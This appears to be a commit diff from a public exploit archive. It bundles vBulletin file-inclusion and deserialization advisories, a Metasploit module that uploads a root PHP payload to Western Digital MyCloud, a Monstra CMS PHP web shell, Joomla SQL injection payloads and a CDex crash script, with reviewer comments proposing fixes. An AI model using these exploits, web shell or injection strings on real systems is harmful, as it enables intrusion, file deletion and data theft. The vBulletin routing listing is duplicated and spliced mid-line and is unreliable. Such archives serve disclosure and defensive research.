vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
## Vulnerability details
vBulletin contains a vulnerability that can allow a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code.
An unauthenticated user is able to send a GET request to /index.php which can then trigger the file inclusion vulnerability with parameter routestring=.
The request allows an attacker to create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server.
**Listing of /index.php:**
```
/* 48 */ $app = vB5_Frontend_Application::init('config.php');
/* 49 */ //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini
/* 50 */ //file to catch these situations.
/* 51 */ // We report all errors here because we have to make Application Notice free
/* 52 */ error_reporting(E_ALL | E_STRICT);
/* 53 */
/* 54 */ $config = vB5_Config::instance();
/* 55 */ if (!$config->report_all_php_errors) {
/* 56 */ // Note that E_STRICT became part of E_ALL in PHP 5.4
/* 57 */ error_reporting(E_ALL & ~(E_NOTICE | E_STRICT));
/* 58 */ }
/* 59 */
/* 60 */ $routing = $app->getRouter();
/* 61 */ $method = $routing->getAction();
/* 62 */ $template = $routing->getTemplate();
/* 63 */ $class = $routing->getControllerClass();
/* 64 */
/* 65 */ if (!class_exists($class))
/* 66 */ {
/* 67 */ // @todo - this needs a proper error message
/* 68 */ die("Couldn't find controller file for $class");
/* 69 */ }
/* 70 */
/* 71 */ vB5_Frontend_ExplainQueries::initialize();
/* 72 */ $c = new $class($template);
/* 73 */
/* 74 */ call_user_func_array(array(&$c, $method), $routing->getArguments());
/* 75 */
/* 76 */ vB5_Frontend_ExplainQueries::finish();
```
**Lets take a closer look on vB5_Frontend_Application::init() Listing of /includes/vb5/frontend/application.php:**
```
/* 15 */ public static function init($configFile)
/* 16 */ {
/* 17 */ parent::init($configFile);
/* 18 */
/* 19 */ self::$instance = new vB5_Frontend_Application();
/* 20 */ self::$instance->router = new vB5_Frontend_Routing();
/* 21 */ self::$instance->router->setRoutes();
/* ... */
```
We can see that setRoutes() is called:
**Listing of /includes/vb5/frontend/routing.php:**
```
/* 47 */ public function setRoutes()
/* 48 */ {
/* 49 */ $this->processQueryString();
/* 50 */
/* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it
/* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : '';
/* 53 */
/* 54 */ if (isset($_GET['routestring']))
/* 55 */ {
/* 56 */ $path = $_GET['routestring'];
/* ... */
/* 73 */ }
/* 74 */
/* 75 */ if (strlen($path) AND $path{0} == '/')
/* 76 */ {
/* 77 */ $path = substr($path, 1);
/* 78 */ }
/* 79 */
/* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them
/* 81 */ if (strlen($path) > 2 )
/* 82 */ {
/* 83 */ $ext = strtolower(substr($path, -4)) ;
/* 84 */ if (($ext == /* 47 */ public function setRoutes()
/* 48 */ {
/* 49 */ $this->processQueryString();
/* 50 */
/* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it
/* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : '';
/* 53 */
/* 54 */ if (isset($_GET['routestring']))
/* 55 */ {
/* 56 */ $path = $_GET['routestring'];
/* ... */
/* 73 */ }
/* 74 */
/* 75 */ if (strlen($path) AND $path{0} == '/')
/* 76 */ {
/* 77 */ $path = substr($path, 1);
/* 78 */ }
/* 79 */
/* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them
/* 81 */ if (strlen($path) > 2 )
/* 82 */ {
/* 83 */ $ext = strtolower(substr($path, -4)) ;
/* 84 */ if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css')
/* 85 */ OR (strtolower(substr($path, -3)) == '.js') )
/* 86 */ {
/* 87 */ header("HTTP/1.0 404 Not Found");
/* 88 */ die('');
/* 89 */ }
/* 90 */ }
/* 91 */
/* 92 */ try
/* 93 */ {
/* 94 */ $message = ''; // Start with no error.
/* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING']));
/* 96 */ }
/* 97 */ catch (Exception $e)
/* 98 */ {
/* ... */
/* 106 */ }
/* ... */
/* 127 */ if (!empty($route))
/* 128 */ {
/* ... */
/* 188 */ }
/* 189 */ else
/* 190 */ {
/* 191 */ // if no route was matched, try to parse route as /controller/method
/* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/'));
/* ... */
/* 229 */ }
/* 230 */
/* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle
/* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll
/* 233 */ //handle deeper paths via more standard routes.
/* 234 */ if (strpos($path, '/') === false)
/* 235 */ {
/* 236 */ $this->controller = 'relay';
/* 237 */ $this->action = 'legacy';
/* 238 */ $this->template = '';
/* 239 */ $this->arguments = array($path);
/* 240 */ $this->queryParameters = array();
/* 241 */ return;
/* 242 */ }
/* 243 */
/* 244 */ vB5_ApplicationAbstract::checkState();
/* 245 */
/* 246 */ throw new vB5_Exception_404("invalid_page_url");
/* 247 */ } ) )
/* 86 */ {
/* 87 */ header("HTTP/1.0 404 Not Found");
/* 88 */ die('');
/* 89 */ }
/* 90 */ }
/* 92 */ try
/* 93 */ {
/* 94 */ $message = ''; // Start with no error.
/* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING']));
/* 96 */ }
/* 97 */ catch (Exception $e)
/* 98 */ {
/* ... */
/* 106 */ }
/* ... */
/* 127 */ if (!empty($route))
/* 128 */ {
/* ... */
/* 188 */ }
/* 189 */ else
/* 190 */ {
/* 191 */ // if no route was matched, try to parse route as /controller/method
/* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/'));
/* ... */
/* 229 */ }
/* 230 */
/* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle
/* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll
/* 233 */ //handle deeper paths via more standard routes.
/* 234 */ if (strpos($path, '/') === false)
/* 235 */ {
/* 236 */ $this->controller = 'relay';
/* 237 */ $this->action = 'legacy';
/* 238 */ $this->template = '';
/* 239 */ $this->arguments = array($path);
/* 240 */ $this->queryParameters = array();
/* 241 */ return;
/* 242 */ }
/* … */
```
So if our routestring does not end with .gif, .png, .jpg, .css or .js and does not contain / char vBulletin will call legacy() method from vB5_Frontend_Controller_Relay /includes/vb5/frontend/controller/relay.php:
```
/* 63 */ public function legacy($file)
/* 64 */ {
/* 65 */ $api = Api_InterfaceAbstract::instance();
/* 66 */ $api->relay($file);
/* 67 */ }
```
If we will check relay() from Api_Interface_Collapsed class /include/api/interface/collapsed.php:
```
/* 117 */ public function relay($file)
/* 118 */ {
/* 119 */ $filePath = vB5_Config::instance()->core_path . '/' . $file;
/* 120 */
/* 121 */ if ($file AND file_exists($filePath))
/* 122 */ {
/* 123 */ //hack because the admincp/modcp files won't return so the remaining processing in
/* 124 */ //index.php won't take place. If we better integrate the admincp into the
/* 125 */ //frontend, we can (and should) remove this.
/* 126 */ vB_Shutdown::instance()->add(array('vB5_Frontend_ExplainQueries', 'finish'));
/* 127 */ require_once($filePath);
/* 128 */ }
/* ... */
```
As we could see an attacker is not able to use / in the $file so he cannot change current directory on Linux. But for Windows he can use \ as path delimiter and is able to specify any desired file (he can use \..\ trick as well) and it will be included by php.
![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-125x300.jpg)
If we want to include file with extension like .gif, .png, .jpg, .css or .js we will need to bypass the mentioned check in setRoutes() method. This can be easily done by adding dot (.) or space (%20) to the filename.
## Proof of Concept
We can check if the server is vulnerable by sending the following GET request:
```
/index.php?routestring=.\\
```
If the response is:
![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-1-300x60.png)
The server is vulnerable.
If we want to inject a php code to any file on the server we can use the access.log for example:
```
/?LogINJ_START=<?php phpinfo();?>LogINJ_END
```
After that we can include access.log with our PHP code:
```
/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log
```
![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-2-300x89.jpg)
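Review bot: the routing.php listing is pasted twice and spliced mid-line at `/* 84 */ if (($ext == /* 47 */ public function setRoutes()`, then resumes with a stray `} ) )` after line 247, so the fenced block does not read as one listing; keep a single copy of lines 47 through 242 (the second copy, intact from `/* 84 */` onward, is the one to keep). On the logic itself, the only separator test before the relay branch is `if (strpos($path, '/') === false)`, and `relay()` builds `core_path . '/' . $file` with no normalisation before `require_once($filePath)`, which is exactly why `\` and `\..\` survive on Windows; the advisory should state the fix next to the PoC: reject `\` as well as `/` (or resolve `realpath($filePath)` and require it to remain under `core_path`) before including anything, and apply the extension check after trimming trailing dots and spaces, since the text notes those bypass it. Minor wording: "If we will check relay()" should read "If we check relay()", and "inject a php code" should read "inject PHP code".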
@ -0,0 +1,117 @@
# SSD Advisory vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion
Source: https://blogs.securiteam.com/index.php/archives/3573
## Vulnerability Summary
The following advisory describes a unauthenticated deserialization vulnerability that leads to arbitrary delete files and, under certain circumstances, code execution found in vBulletin version 5.
vBulletin, also known as vB, is “a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage”.
## Credit
A security researcher from, TRUEL IT ( @truel_it ), has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
CVE: CVE-2017-17672
## Vulnerability details
Unsafe usage of PHPs unserialize() on user-supplied input allows an unauthenticated attacker to delete arbitrary files and, under certain circumstances, execute arbitrary code on a vBulletin installation.
vB_Library_Templates cacheTemplates() function, which is an publicly exposed API which allows to fetch information on a set of given templates from the database in order to store them inside a cache variable.
File core/vb/api/template.php function cacheTemplates():
```
public function cacheTemplates($templates, $templateidlist, $skip_bbcode_style = false,
$force_set = false)
{
return vB_Library::instance('template')->cacheTemplates($templates, $templateidlist, $skip_bbcode_style, $for
```
Lets take a look at $templateidlist core/vb/library/template.php function cacheTemplates():
````
public function cacheTemplates($templates, $templateidlist, $skip_bbcode_style = false,
$force_set = false)
{
$vboptions = vB::getDatastore()
// vB_Library_Style::switchCssStyle() may pass us a templateidlist that's already unserialized.
if (!is_array($templateidlist))
{
$templateidlist = unserialize($templateidlist);
}
foreach ($templates AS $template)
{
if (isset($templateidlist[$template]))
{
$templateids[] = intval($templateidlist[$template]);
}
}
if (!empty($templateids))
{
$temps = vB::getDbAssertor(array('title', 'textonly', 'template_un', 'template'));
// cache templates
foreach ($temps as $temp)
{
if (empty(self::$templatecache["$temp[title]"]) OR $force_set)
{
self::$templatecache["$temp[title]"] = $this;
}
}
}
if (!$skip_bbcode_style)
{
self::$bbcode_style = array(
'code' => &$templateassoc['bbcode_code_styleid'],
'html' => &$templateassoc['bbcode_html_styleid'],
'php' => &$templateassoc['bbcode_php_styleid'],
'quote' => &$templateassoc['bbcode_quote_styleid']
);
}
}
```
$temnplateidlist variable, which can come directly from user-input, is directly supplied to unserialize(), resulting in an arbitrary deserialization primitive.
## Proof of Concept
By sending the following POST request an unauthenticated attacker can delete files from the victims server
```
POST /vb533/ajax/api/template/cacheTemplates HTTP/1.1
Host: vb533.test
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:13:"/path/to/file";}
```
The server then will respond with:
```
HTTP/1.1 200 OK
Date: Fri, 27 Oct 2017 09:27:52 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: sessionhash=409d8f4b16ebb55471e63509834d0eff; path=/; HttpOnly
Set-Cookie: lastvisit=1509096472; path=/; HttpOnly
Set-Cookie: lastactivity=1509096472; path=/; HttpOnly
Set-Cookie: sessionhash=44b1e8d2d433031ec2501649630dd8bf; path=/; HttpOnly
Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0
Expires: Sat, 1 Jan 2000 01:00:00 GMT
Last-Modified: Fri, 27 Oct 2017 09:27:52 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2101
Connection: close
Content-Type: application/json; charset=UTF-8
{"errors":[["unexpected_error","Cannot use object of type vB_Image_ImageMagick as array"]]}
```
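Review bot: the listing of core/vb/library/template.php opens its fence with four backticks (````) and closes with three, which breaks Markdown rendering of everything after it; the core/vb/api/template.php excerpt above it is cut mid-token at `$for`, and `$temnplateidlist` in the paragraph below the listing should be `$templateidlist`. On the code, `if (!is_array($templateidlist)) { $templateidlist = unserialize($templateidlist); }` is the sink, and the only later use is `intval($templateidlist[$template])`, so no object ever needs to come out of it; the safe change is `unserialize($templateidlist, array('allowed_classes' => false))` on PHP 7+, or better, requiring the caller to pass an array of integers and rejecting anything else, which removes the gadget entry point (`vB_Image_ImageMagick` in the PoC) entirely. Also, "a unauthenticated deserialization vulnerability that leads to arbitrary delete files" in the summary should read "an unauthenticated deserialization vulnerability that leads to arbitrary file deletion", and "which is an publicly exposed API" should read "which is a publicly exposed API".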
107
exploits/php/remote/43356.rb Executable file
@ -0,0 +1,107 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :method => 'HEAD', :uri => '/web/', :pattern => [/Apache/] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Western Digital MyCloud multi_uploadify File Upload Vulnerability',
'Description' => %q{
This module exploits a file upload vulnerability found in Western Digital's MyCloud
NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php
PHP script provides multipart upload functionality that is accessible without authentication
and can be used to place a file anywhere on the device's file system. This allows an
attacker the ability to upload a PHP shell onto the device and obtain arbitrary code
execution as root.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Zenofex <zenofex[at]exploitee.rs>' # Initial vulnerability discovery, PoC, and Metasploit module
],
'References' =>
[
['URL', 'https://www.exploitee.rs/index.php/Western_Digital_MyCloud#.2Fjquery.2Fuploader.2Fmulti_uploadify.php_.28added_08.2F06.2F2017.29'],
['URL', 'https://download.exploitee.rs/file/generic/Exploiteers-DEFCON25.pdf'],
['URL', 'https://www.youtube.com/watch?v=EO_49pfmA5A'],
['CVE', '2017-17560']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'Privileged' => true,
'DisclosureDate' => 'Jul 29 2017',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi('uri' => '/web/jquery/uploader/multi_uploadify.php')
if res.nil?
vprint_error('Connection failed')
return CheckCode::Unknown
end
if res.code == 302 && res.headers['Location'] =~ /\?status=1/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def upload(web_folder, fname, file)
# construct post data
data = Rex::MIME::Message.new
data.add_part(file, 'application/x-php', nil, "form-data; name=\"Filedata[]\"; filename=\"#{fname}\"")
# upload
res = send_request_cgi({
'method' => 'POST',
'uri' => '/web/jquery/uploader/multi_uploadify.php',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'vars_get' => {
'folder' => web_folder
}
})
end
def exploit
if check != CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, 'Target does not appear to be a vulnerable Western Digital MyCloud device')
end
# upload PHP payload to '/var/www' (webroot).
web_folder = '/var/www'
php = "<?php #{payload.encoded} ?>"
print_status("Uploading PHP payload (#{php.length} bytes) to '#{web_folder}'.")
fname = ".#{rand_text_alphanumeric(rand(10) + 6)}.php"
res = upload(web_folder, fname, php)
# check upload response
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
if res.code != 302 || res.headers['Location'] =~ /\?status=0/
fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
end
print_good('Uploaded PHP payload successfully.')
# register uploaded php payload file for cleanup
register_files_for_cleanup(fname)
# retrieve and execute PHP payload
print_status("Making request for '/#{fname}' to execute payload.")
res = send_request_cgi({'uri' => normalize_uri(fname)}, 15)
end
end
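Review bot: `register_files_for_cleanup(fname)` registers the bare file name, but the file was written to `#{web_folder}/#{fname}`; a relative path is resolved against the session's working directory, so cleanup should register `"#{web_folder}/#{fname}"` (the same location `normalize_uri(fname)` assumes is served from the webroot). The result of the final `send_request_cgi({'uri' => normalize_uri(fname)}, 15)` is assigned to `res` and never inspected; either drop the assignment or check it so that a non-200 reply on the payload URL is reported instead of silently ignored. The two `Location` tests (`/\?status=1/` in `check`, `/\?status=0/` in `exploit`) deserve a comment saying that the module reads a 302 to `?status=1` as "upload script present, upload accepted" and `?status=0` as "upload refused", since that convention is not obvious from the code.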
@ -0,0 +1,61 @@
Exploit Title: Monstra CMS - 3.0.4 RCE
Vendor Homepage: http://monstra.org/
Software Link:
https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip
Discovered by: Ishaq Mohammed
Contact: https://twitter.com/security_prince
Website: https://about.me/security-prince
Category: webapps
Platform: PHP
Advisory Link: https://blogs.securiteam.com/index.php/archives/3559
Description:
MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a
remote command execution on the remote server.
Vulnerable Code:
https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php
line 19:
public static function main()
{
// Array of forbidden types
$forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht',
'php', 'phtml', 'php3', 'php4', 'php5',
'phps',
'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh',
'ksh', 'bsh', 'c', 'htaccess', 'htpasswd',
'exe', 'scr', 'dll', 'msi', 'vbs', 'bat',
'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty');
Proof of Concept
Steps to Reproduce:
1. Login with a valid credentials of an Editor
2. Select Files option from the Drop-down menu of Content
3. Upload a file with PHP (uppercase)extension containing the below code:
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
4. Click on Upload
5. Once the file is uploaded Click on the uploaded file and add ?cmd= to
the URL followed by a system command such as whoami,time,date etc.
Recommended Patch:
We were not able to get the vendor to respond in any way, the software
appears to have been left abandoned without support though this is not an
official status on their site (last official patch was released on
2012-11-29), the GitHub appears a bit more active (last commit from 2 years
ago).
The patch that addresses this bug is available here:
https://github.com/monstra-cms/monstra/issues/426
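Review bot: the `$forbidden_types` array is all lower-case and step 3 of the reproduction uploads an upper-case `PHP` extension, so the comparison is case-sensitive; that is the root cause and the advisory should say so rather than leaving the reader to infer it from "(uppercase)". The fix is to lower-case the extension (`strtolower(pathinfo($name, PATHINFO_EXTENSION))`) before the check and, preferably, to replace the denylist with an allowlist of the file types the files manager actually needs, because a denylist misses any extension the web server maps to an interpreter that is not on the list. Grammar: "Login with a valid credentials of an Editor" should read "Log in with valid Editor credentials", and "leads to a remote command execution" should read "leads to remote command execution".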
@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component JB Visa 1.0 - SQL Injection
# Dork: N/A
# Date: 17.12.2017
# Vendor Homepage: http://joombooking.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jb-visa/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_bookpro&view=popup&visatype=[SQL]
#
# 259999%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*)%2cCONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e%2c0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200%2c1)%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)
#
# # # # #
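Review bot: the PoC value begins with a bare integer (`259999 AND(...)`), which shows `visatype` is used unquoted in a numeric comparison; the component should read it as an integer (`$app->input->getInt('visatype')` in Joomla, or an `(int)` cast) and bind it through the database driver's `quote()` or a prepared query instead of concatenating it, which removes the injection regardless of what follows the number. The description line "The vulnerability allows an attacker to inject sql commands...." is boilerplate; name the view and parameter (`view=popup`, `visatype`) there so the entry is searchable.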
@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component Guru Pro 'promocode'- SQL Injection
# Dork: N/A
# Date: 17.12.2017
# Vendor Homepage: https://www.ijoomla.com/
# Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/guruBuy?promocode=[SQL]
#
# '%20/*!50000Procedure*/%20/*!50000Analyse*/%20(extractvalue(0%2c/*!50000concat*/(0x27%2c0x496873616e2053656e63616e%2c0x3a%2c@@version))%2c0)%2d%2d%200x2d
#
# # # # #
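Review bot: here the injection starts with `'`, so `promocode` lands inside a quoted string literal in the query; the fix is to pass it through `$db->quote()` or a bound parameter at the point of use rather than concatenating it. The title "Guru Pro 'promocode'- SQL Injection" is missing a space before the dash, and the Version field is "N/A" while the CSV row in this commit records the entry without a version either; if the affected range is known it belongs here.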
@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component User Bench 1.0 - SQL Injection
# Dork: N/A
# Date: 18.12.2017
# Vendor Homepage: http://www.gegabyte.org/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/user-bench/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_userbench&view=detail&userid=[SQL]
#
# %20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*)%2cCONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e%2c0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200%2c1)%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)
#
# # # # #
@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component My Projects 2.0 - SQL Injection
# Dork: N/A
# Date: 18.12.2017
# Vendor Homepage: http://www.gegabyte.org/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/my-projects/
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php/component/myproject/VerAyari[SQL]
#
# 'and%20(select%201%20from%20(select%20count(*)%2cconcat((select(select%20concat(cast(database()%20as%20char)%2c0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20AND%20''='
#
# # # # #
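Review bot: the injection point is a path segment (`/component/myproject/VerAyari[SQL]`) rather than a query parameter, and the payload opens with `'` and closes with `AND ''='`, so the router passes the segment into a quoted string in SQL; the router's parse function should validate the segment as a slug (letters, digits, hyphens) and the model should quote it with `$db->quote()` or a bound parameter. The description line is the same boilerplate as the other three Joomla entries in this commit; state that the vulnerable input is the path segment after `myproject/`.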
27
exploits/windows/dos/43352.py Executable file
@ -0,0 +1,27 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: CDex 1.96 - Local Stack Buffer Overflow
# Date: 17-12-2017
# Vulnerable Software: CDex 1.96 (Unicode Build)
# Vendor Homepage: http://cdex.mu/
# Version: v1.96
# Software Link: http://cdex.mu/?q=download
# Tested On: Windows 7 x32
#
#
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
#
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers
#
file="crash.txt"
crash = "A"*520 + "B"*4 #seh
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()
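Review bot: the write uses a bare `open()`/`close()` pair; `with open(file, "w") as f: f.write(crash)` closes the handle even if the write raises. The `00420042` in the comment is `BB` widened to UTF-16, which is what "Unicode Build" in the header implies; saying explicitly that the pasted text is converted to UTF-16 before the overflow would make the "no unicode ppr pointers" remark understandable to a reader. The title here is "CDex 1.96 - Local Stack Buffer Overflow" while the CSV row for 43352 in this commit says "CDex 1.96 - Buffer Overflow"; one should match the other.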
@ -5421,6 +5421,9 @@ id,file,description,date,author,type,platform,port
41612,exploits/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",dos,multiple,
41615,exploits/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow",2017-03-15,"Hossein Lotfi",dos,windows,
41620,exploits/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",dos,windows,
43352,exploits/windows/dos/43352.py,"CDex 1.96 - Buffer Overflow",2017-12-18,bzyo,dos,windows,
43354,exploits/linux/dos/43354.txt,"Zoom Linux Client 2.0.106600.0904 - Command Injection",2017-12-18,Conviso,dos,linux,
43355,exploits/linux/dos/43355.txt,"Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow",2017-12-18,Conviso,dos,linux,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -9188,7 +9191,7 @@ id,file,description,date,author,type,platform,port
41015,exploits/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",local,windows,
41020,exploits/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)",2017-01-03,Saif,local,win_x86-64,
41021,exploits/multiple/local/41021.md,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,local,multiple,
41022,exploits/linux/local/41022.txt,"Firejail - Local Privilege Escalation",2017-01-09,"Daniel Hodson",local,linux,
41022,exploits/linux/local/41022.md,"Firejail - Local Privilege Escalation",2017-01-09,"Daniel Hodson",local,linux,
41076,exploits/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",local,linux,
41090,exploits/windows/local/41090.py,"SentryHD 02.01.12e - Local Privilege Escalation",2017-01-18,"Kacper Szurek",local,windows,
41130,exploits/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",local,android,
@ -9219,6 +9222,7 @@ id,file,description,date,author,type,platform,port
41605,exploits/win_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,local,win_x86-64,
41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows,
